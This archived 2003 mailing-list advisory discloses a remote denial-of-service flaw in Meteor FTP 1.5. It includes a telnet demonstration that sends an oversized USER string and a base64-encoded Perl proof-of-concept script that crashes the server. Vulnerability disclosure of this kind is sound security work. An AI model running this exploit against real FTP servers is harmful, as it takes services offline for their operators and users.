Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Sat, 9 Aug 2003 13:31:13 -0400 (EDT)
From: Zee <[email protected]>
To: [email protected]
Subject: Remote denial of service vulnerability in Meteor FTP Version 1.5

--0-1868877764-1060450273=:15746
Content-Type: TEXT/PLAIN; charset=US-ASCII

www.evicted.org
[email protected]
August 8, 2003

Meteor FTP Version 1.5 Remote Denial of Service Vulnerability

1. Introduction
----------------
Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.


2. Vulnerability
-----------------
A vulnerability exists in Meteor FTP Version 1.5, which allows any
malicious user to remotely cause a denial of service against the ftp
server.

By connecting to the Meteor FTP server and issuing USER followed by large
amounts of data, the ftp server will crash.


3. Example
-----------
Proof of concept exploit (meteordos.pl) is included in the attachment.

root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.
root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
USER anonymous
QUIT
telnet> quit
Connection closed.

At this point the server has completely froze up. On the server side, the
Meteor FTP spits out a dialog :

"Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525),
program terminated."

By clicking "OK", Meteor FTP terminates.



4. Vendor status
----------------
Vendor has been notified, waiting for response...


5. Credits
-----------
Vulnerability & code by zerash
You can view this advisory at :
http://www.evicted.org/projects/writings/mftpadvisory.txt
You can view the exploit at :
http://www.evicted.org/projects/code/meteordos.pl


6. Contact
-----------
Please send suggestions, updates, and comments to :
[email protected]
http://www.evicted.org
--0-1868877764-1060450273=:15746
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="meteordos.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description: 
Content-Disposition: attachment; filename="meteordos.pl"

IyEvdXNyL2Jpbi9wZXJsDQojDQojIG1ldGVvcmRvcy5wbCAtIFJlbW90ZSBk
ZW5pYWwgb2Ygc2VydmljZSBhZ2FpbnN0IE1ldGVvciBGVFAgVmVyc2lvbiAx
LjUNCiMNCiMgQSB2dWxuZXJhYmlsaXR5IGhhcyBiZWVuIGlkZW50aWZpZWQg
aW4gTWV0ZW9yIEZUUCBWZXJzaW9uIDEuNSwgd2hpY2gNCiMgYWxsb3dzIG1h
bGljaW91cyB1c2VycyB0byByZW1vdGVseSBjcmFzaCB0aGUgZnRwZC4gQnkg
Y29ubmVjdGluZyB0byB0aGUgDQojIGZ0cGQgYW5kIGlzc3VpbmcgVVNFUiBm
b2xsb3dlZCBieSBsYXJnZSBhbW91bnRzIG9mIGRhdGEsIHRoZSBzZXJ2ZXIg
DQojIGNyYXNoZXMuIEZvciBtb3JlIGluZm8sIGdvIHRvIDogDQojIGh0dHA6
Ly93d3cuZXZpY3RlZC5vcmcvcHJvamVjdHMvd3JpdGluZ3MvbWZ0cGFkdmlz
b3J5LnR4dA0KIyANCiMgVXNhZ2UgOiAuL21ldGVvcmRvcy5wbCA8aG9zdC9p
cD4NCiMNCiMgVnVsbmVyYWJpbGl0eSAmIGNvZGUgYnkgemVyYXNoDQojIENv
bnRhY3QgOiB6ZXJhc2hAZXZpY3RlZC5vcmcNCg0KdXNlIE5ldDo6RlRQOw0K
JGhvc3QgPSAkQVJHVlswXTsNCg0KaWYoIiRBUkdWWzBdIiBlcSAiIikgew0K
CXByaW50KCJEb1MgYWdhaW5zdCBNZXRlb3IgRlRQIFZlcnNpb24gMS41IGJ5
IHplcmFzaFxAZXZpY3RlZC5vcmdcbiIpOw0KCWRpZSgiVXNhZ2UgOiAuL21l
dGVvcmZ0cGRvcyA8aG9zdFwvaXA+XG4iKTsNCn0gZWxzZSB7CQ0KCQ0KCXBy
aW50KCJDb25uZWN0aW5nIHRvICRob3N0Li4uXG4iKTsNCglteSAkZnRwID0g
TmV0OjpGVFAtPm5ldygkaG9zdCkgb3IgZGllICJDb3VsZG4ndCBjb25uZWN0
IHRvICRob3N0XG4iOw0KCXByaW50KCJDb25uZWN0ZWQhXG4iKTsNCglwcmlu
dCgiQXR0ZW1wdGluZyB0byBleHBsb2l0IHRoZSBmdHBkLi4uIik7DQoJJGZ0
cC0+bG9naW4oJyUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl
JSUlJSUlJSUlJScpOw0KCSRmdHAtPnF1aXQ7DQoJcHJpbnQoIlN1Y2Nlc3Mh
XG4iKTsNCn0NCg0K

--0-1868877764-1060450273=:15746--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: